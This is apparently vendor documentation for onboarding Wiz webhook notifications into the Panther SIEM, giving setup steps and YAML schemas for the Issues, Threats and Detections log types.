Wiz Webhook (Beta)
Panther supports receiving logs from Wiz webhooks
Overview
Panther can receive real-time webhook notifications from Wiz containing Issues, Threats, and Detections events. This integration provides immediate visibility into security findings across your cloud infrastructure, enabling fast incident response.
How to onboard Wiz webhook logs to Panther
Prerequisites
To set up this integration, you must have access to a Wiz tenant and permission to create a webhook.
To receive Threats and Detections events, you must have a subscription to Wiz Defend.
Step 1: Create a new Wiz webhook log source in Panther
In the left-hand navigation bar of your Panther Console, click Configure > Log Sources.
Click Create New.
Search for "Wiz Webhook," then click its tile.
In the upper-right corner of the slide-out panel, click Start Setup.
Follow Panther's instructions for configuring an HTTP Source, beginning at Step 5.
Payloads sent to this source are subject to the payload requirements for all HTTP sources.
Do not proceed to the next step until the creation of your HTTP endpoint has completed.
Step 2: Configure webhook notifications in Wiz
In your Wiz console, navigate to Settings > Integrations.
Click Add Integration.
Under SIEM & Automation Tools, click Webhook.
On the New Integration page, fill in the fields:
Name: provide a descriptive name for the webhook, e.g.,
Panther Integration.Project Scope: select the scopes you'd like to include.
URL: enter the HTTP Source URL you generated in Panther.
Authentication: select the type of authentication you used in Panther in Step 1, and provide the associated credentials.
Click Add Integration.
Panther-managed detections
See Panther-managed rules for Wiz in the panther-analysis GitHub repository.
Supported log types
Wiz.IssuesWebhook
The Issues log records key events in Wiz related to issues, such as vulnerability findings and security incidents. It is used to track, manage, and remediate security vulnerabilities and incidents.
schema: Wiz.IssuesWebhook
description: The Issues Log records key events in Wiz related to issues, such as vulnerability findings and security incidents. It is used to track, manage, and remediate security vulnerabilities and incidents.
referenceURL: https://win.wiz.io/docs/issues-webhook
fields:
- name: trigger
required: true
type: object
description: Contains information about what triggered the webhook event
fields:
- name: source
type: string
description: Source of the trigger
- name: type
type: string
description: Type of trigger event
- name: ruleId
type: string
description: ID of the automation rule
- name: ruleName
type: string
description: Name of the automation rule
- name: updatedFields
type: string
description: List of updated fields
- name: changedBy
type: string
description: User that initiated the change
indicators:
- username
- name: triggeredBy
type: string
description: The user or Automation Rule that ran an Action
- name: issue
required: true
type: object
description: Contains information about the issue that was triggered
fields:
- name: id
type: string
description: Unique identifier of the Issue
- name: status
type: string
description: Current status of the Issue
- name: severity
type: string
description: Severity level of the Issue
- name: created
type: timestamp
timeFormats:
- rfc3339
description: Creation timestamp
isEventTime: true
- name: projects
type: string
description: Projects associated with the issue
- name: evidence
type: json
description: Evidence details (see note below)
- name: link
type: string
indicators:
- url
description: Direct link to the issue in Wiz
- name: resource
required: true
type: object
description: Represents the affected cloud resource
fields:
- name: id
type: string
description: Cloud provider's resource ID
- name: name
type: string
description: Resource name
- name: type
type: string
description: Native resource type
- name: resourceType
type: string
description: Resource type
- name: cloudPlatform
type: string
description: Cloud platform identifier
- name: subscriptionId
type: string
description: Subscription ID
- name: subscriptionName
type: string
description: Subscription name
- name: subscriptionTags
type: json
description: Tags associated with the subscription
- name: region
type: string
description: Resource region
- name: status
type: string
description: Resource status
- name: cloudProviderURL
type: string
indicators:
- url
description: URL to resource in cloud console
- name: resourceGroupId
type: string
description: Resource group ID
- name: tags
type: json
description: Tags associated with the resource
- name: externalId
type: string
description: External identifier
- name: created
type: timestamp
timeFormats:
- rfc3339
description: Creation time of primary resource
- name: kubernetesClusterId
type: string
description: K8s cluster ID
- name: kubernetesClusterName
type: string
description: K8s cluster name
- name: kubernetesNamespaceName
type: string
description: K8s namespace name
- name: containerServiceId
type: string
description: Container service ID
- name: containerServiceName
type: string
description: Container service name
- name: originalJson
type: json
description: Original JSON from cloud provider
- name: control
required: true
type: object
description: Represents the Control that generated the Issue
fields:
- name: id
type: string
description: Control identifier
- name: name
type: string
description: Control name
- name: description
type: string
description: Control description
- name: severity
type: string
description: Control severity level
- name: risks
type: json
description: Associated risks
- name: resolutionRecommendation
type: string
description: Resolution recommendation
- name: resolutionRecommendationPlainText
type: string
description: Plain text resolution recommendation
- name: sourceCloudConfigurationRuleId
type: string
description: Source cloud configuration rule ID
- name: sourceCloudConfigurationRuleName
type: string
description: Source cloud configuration rule name
Wiz.Threats
The Threats log records webhook notifications for threat detection events. This helps track active threats, malicious activities, and security incidents across your cloud infrastructure.
schema: Wiz.Threats
description: The Threats Log records key events in Wiz related to threats, such as vulnerability findings and security incidents. It is used to track, manage, and remediate security vulnerabilities and incidents.
referenceURL: https://win.wiz.io/docs/threats-webhook
fields:
- name: trigger
required: true
type: object
description: Contains information about the event that triggered the webhook
fields:
- name: source
type: string
description: The source of the trigger. For this webhook, the value is always THREATS
- name: type
type: string
description: The type of trigger, e.g., Manually Triggered or Rule Triggered
- name: ruleId
type: string
description: If triggered by a rule, the unique identifier of that rule
- name: ruleName
type: string
description: The name of the trigger, e.g., Manual or the name of the automation rule
- name: updatedFields
type: string
description: A description of fields that were changed, triggering the webhook
- name: changedBy
type: string
description: The user or system that initiated the change
- name: threat
required: true
type: object
description: The main object containing all the details of the exported Threat
fields:
- name: id
type: string
description: Unique identifier for the Threat
- name: title
type: string
description: The title of the Threat
- name: description
type: string
description: A detailed description of the Threat
- name: status
type: string
description: The current status of the Threat (e.g., IN_PROGRESS, RESOLVED)
- name: severity
type: string
description: The severity level of the Threat (e.g., CRITICAL, HIGH)
- name: created
type: timestamp
timeFormats:
- rfc3339
isEventTime: true
description: ISO 8601 timestamp for when the Threat was created
- name: resolutionNote
type: string
description: The note added when the Threat was resolved
- name: projects
type: string
description: A comma-separated list of projects associated with the Threat
- name: threatURL
type: string
indicators:
- url
description: A direct URL to the Threat in the UI
- name: resolvedAt
type: timestamp
timeFormats:
- rfc3339
description: ISO 8601 timestamp for when the Threat was resolved
- name: updatedAt
type: timestamp
timeFormats:
- rfc3339
description: ISO 8601 timestamp for the last time the Threat was updated
- name: cloudPlatform
type: string
description: The cloud platform where the Threat was detected (e.g., Azure, AWS)
- name: cloudAccounts
type: array
description: List of associated cloud accounts
element:
type: object
fields:
- name: id
type: string
description: The unique identifier for the cloud account
- name: name
type: string
description: The name of the cloud account
- name: cloudOrganizations
type: array
description: List of associated cloud organizations
element:
type: object
fields:
- name: id
type: string
description: The unique identifier for the cloud organization
- name: name
type: string
description: The name of the cloud organization
- name: actors
type: array
description: List of actors involved in the Threat
element:
type: object
fields:
- name: externalId
type: string
description: The ID of the actor as defined in the cloud provider
- name: id
type: string
description: The internal unique identifier for the actor
indicators:
- actor_id
- name: name
type: string
description: The name of the actor
- name: nativeType
type: string
description: The specific type of the actor from the cloud provider's perspective
- name: type
type: string
description: The general type of the actor (e.g., Service Account)
- name: resources
type: array
description: List of resources involved in the Threat
element:
type: object
fields:
- name: name
type: string
description: The name of the resource
- name: externalId
type: string
description: The full resource identifier from the cloud provider
- name: id
type: string
description: The internal unique identifier for the resource
- name: nativeType
type: string
description: The specific type of the resource from the cloud provider's perspective
- name: type
type: string
description: The general type of the resource (e.g., Virtual Machine)
- name: tdrNames
type: string
description: A comma-separated list of the names of the underlying detection rules
- name: detectionIds
type: string
description: A comma-separated list of the IDs of the underlying detections
- name: mitreTechniques
type: array
description: A list of MITRE ATT&CK technique IDs
element:
type: string
indicators:
- mitre_attack_technique
- name: mitreTactics
type: array
description: A list of MITRE ATT&CK tactic IDs
element:
type: string
indicators:
- mitre_attack_technique
- name: notes
type: string
description: A comma-separated list of notes added to the Threat
Wiz.Detections
The Detections log captures webhook notifications for security detection findings. This includes alerts from security rules, anomaly detection, and behavioral analysis.
schema: Wiz.Detections
description: The Detections Log records key events in Wiz related to detections, such as vulnerability findings and security incidents. It is used to track, manage, and remediate security vulnerabilities and incidents.
referenceURL: https://win.wiz.io/docs/detections-webhook
fields:
- name: trigger
required: true
type: object
description: Details on the trigger including source, type, ruleId, and ruleName
fields:
- name: source
type: string
description: Source of the trigger
- name: type
type: string
description: Type of trigger event
- name: ruleId
type: string
description: ID of the automation rule
- name: ruleName
type: string
description: Name of the automation rule
- name: id
required: true
type: string
description: Unique identifier for the detection
- name: threatId
required: true
type: string
description: ID of the associated threat
- name: threatURL
required: true
type: string
indicators:
- url
description: URL linking to more details on the threat
- name: title
type: string
description: Title or summary of the detection
- name: description
type: string
description: Description providing more details on the detection
- name: severity
type: string
description: Severity level of the detection
- name: createdAt
type: timestamp
timeFormats:
- rfc3339
isEventTime: true
description: ISO8601 timestamp for when detection was created
- name: tdrId
type: string
description: TDR identifier
- name: tdrSource
type: string
description: TDR source
- name: mitreTactics
type: array
element:
type: string
description: MITRE tactic related to detection
- name: mitreTechniques
type: array
element:
type: string
description: MITRE technique related to detection
- name: cloudAccounts
type: array
description: List of associated cloud accounts
element:
type: object
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: cloudOrganizations
type: array
description: List of associated cloud organizations
element:
type: object
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud organization
- name: id
type: string
description: ID of the cloud organization
- name: name
type: string
description: Name of the cloud organization
- name: timeframe
type: object
description: Object containing start and end timestamps for the detection timeframe
fields:
- name: start
type: timestamp
timeFormats:
- rfc3339
description: Start timestamp of the detection timeframe
- name: end
type: timestamp
timeFormats:
- rfc3339
description: End timestamp of the detection timeframe
- name: actors
type: array
description: List of actor details
element:
type: object
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: actingAs
type: object
description: Actor acting as
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: email
type: string
description: Email of the actor
- name: primaryActor
type: object
description: Primary actor associated with the detection
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
indicators:
- actor_id
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: actingAs
type: object
description: Actor acting as
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: email
type: string
description: Email of the actor
- name: resources
type: array
description: List of resource details
element:
type: object
fields:
- name: cloudAccount
type: object
description: Associated cloud account information
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Resource ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the resource
- name: nativeType
type: string
description: Native type classification
- name: region
type: string
description: Geographic region
- name: status
type: string
description: Status of the eventCurrent status of the resource
- name: type
type: string
description: Type of resource
- name: kubernetesNodeId
type: string
description: Kubernetes node ID
- name: kubernetesNodeName
type: string
description: Kubernetes node name
- name: kubernetesNamespaceId
type: string
description: Kubernetes namespace ID
- name: kubernetesNamespaceName
type: string
description: Kubernetes namespace name
- name: kubernetesClusterId
type: string
description: ID of the Kubernetes cluster
- name: kubernetesClusterName
type: string
description: Name of the Kubernetes cluster
- name: cloudProviderUrl
type: string
description: URL to resource in cloud provider console.
indicators:
- url
- name: primaryResource
type: object
description: Primary resource associated with the detection
fields:
- name: cloudAccount
type: object
description: Associated cloud account information
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Resource ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the resource
- name: nativeType
type: string
description: Native type classification
- name: region
type: string
description: Geographic region
- name: status
type: string
description: Status of the eventCurrent status of the resource
- name: type
type: string
description: Type of resource
- name: kubernetesNodeId
type: string
description: Kubernetes node ID
- name: kubernetesNodeName
type: string
description: Kubernetes node name
- name: kubernetesNamespaceId
type: string
description: Kubernetes namespace ID
- name: kubernetesNamespaceName
type: string
description: Kubernetes namespace name
- name: kubernetesClusterId
type: string
description: ID of the Kubernetes cluster
- name: kubernetesClusterName
type: string
description: Name of the Kubernetes cluster
- name: cloudProviderUrl
type: string
description: URL to resource in cloud provider console.
indicators:
- url
- name: triggeringEventsCount
type: bigint
description: Count of events that triggered detection
- name: triggeringEvents
type: array
description: List of event details
element:
type: object
fields:
- name: actor
type: object
description: Actor associated with event
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
indicators:
- actor_id
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: actingAs
type: object
description: Actor acting as
fields:
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Actor ID
- name: name
type: string
description: Name of the actor
- name: nativeType
type: string
description: Native type classification
- name: type
type: string
description: Type of the actor
- name: email
type: string
description: Email of the actor
indicators:
- email
- name: actorIP
type: string
indicators:
- ip
description: IP address of the actor
- name: actorIPMeta
type: object
description: Metadata object containing IP information
fields:
- name: autonomousSystemNumber
type: bigint
description: ASN number
- name: autonomousSystemOrganization
type: string
description: Organization associated with ASN (ASO)
- name: country
type: string
description: Country of origin for IP
- name: isForeign
type: boolean
description: Whether IP is from foreign source
- name: reputation
type: string
description: IP reputation rating
- name: reputationSource
type: string
description: Source of reputation data
- name: reputationDescription
type: string
description: Description of IP reputation
- name: relatedAttackGroupNames
type: json
description: Attack groups associated with IP
- name: customIPRanges
type: json
description: Object containing custom IP range definitions
- name: category
type: string
description: Event category
- name: cloudPlatform
type: string
description: Cloud platform where event occurred
- name: cloudProviderUrl
type: string
indicators:
- url
description: URL to event in cloud provider console
- name: description
type: string
description: Description of the event
- name: eventTime
type: timestamp
timeFormats:
- rfc3339
description: ISO8601 timestamp of when event occurred
- name: externalId
type: string
description: External ID of the event
- name: id
type: string
description: Event ID
- name: name
type: string
description: Name of the event
- name: origin
type: string
description: Origin of the event
- name: resources
type: array
description: Resource objects affected by event
element:
type: object
fields:
- name: cloudAccount
type: object
description: Associated cloud account information
fields:
- name: cloudPlatform
type: string
description: Name of cloud provider
- name: externalId
type: bigint
description: External ID for cloud account
- name: id
type: string
description: ID of the cloud account
- name: name
type: string
description: Name of the cloud account
- name: externalId
type: string
description: External ID
- name: id
type: string
description: Resource ID
- name: providerUniqueId
type: string
description: Unique identifier from the provider.
- name: name
type: string
description: Name of the resource
- name: nativeType
type: string
description: Native type classification
- name: region
type: string
description: Geographic region
- name: status
type: string
description: Status of the eventCurrent status of the resource
- name: type
type: string
description: Type of resource
- name: kubernetesNodeId
type: string
description: Kubernetes node ID
- name: kubernetesNodeName
type: string
description: Kubernetes node name
- name: kubernetesNamespaceId
type: string
description: Kubernetes namespace ID
- name: kubernetesNamespaceName
type: string
description: Kubernetes namespace name
- name: kubernetesClusterId
type: string
description: ID of the Kubernetes cluster
- name: kubernetesClusterName
type: string
description: Name of the Kubernetes cluster
- name: cloudProviderUrl
type: string
description: URL to resource in cloud provider console.
indicators:
- url
- name: runtimeDetails
type: object
description: Runtime details of the event
fields:
- name: processTree
type: array
description: Process tree leading to event
element:
type: object
fields:
- name: command
type: string
description: Process command line
- name: container
type: object
description: Container metadata including id, name, and image details
fields:
- name: externalId
type: string
description: Container external ID
- name: id
type: string
description: Container ID
- name: imageExternalId
type: string
description: Image external ID
- name: imageId
type: string
description: Image ID
- name: name
type: string
description: Container name
- name: executionTime
type: timestamp
timeFormats:
- rfc3339
description: ISO8601 timestamp when process executed
- name: hash
type: string
indicators:
- sha1
description: Executable SHA1 hash
- name: id
type: string
description: Process ID
- name: path
type: string
description: Executable path
- name: size
type: bigint
description: Executable size in bytes
- name: userId
type: string
description: User ID that executed process
- name: username
type: string
description: Username that executed process
indicators:
- username
- name: source
type: string
description: Source of the event
- name: subjectResourceId
type: string
description: ID of the primary affected resource
- name: subjectResourceIp
type: string
description: IP of the primary affected resource
indicators:
- ip
- name: status
type: string
description: Status of the event
Last updated
Was this helpful?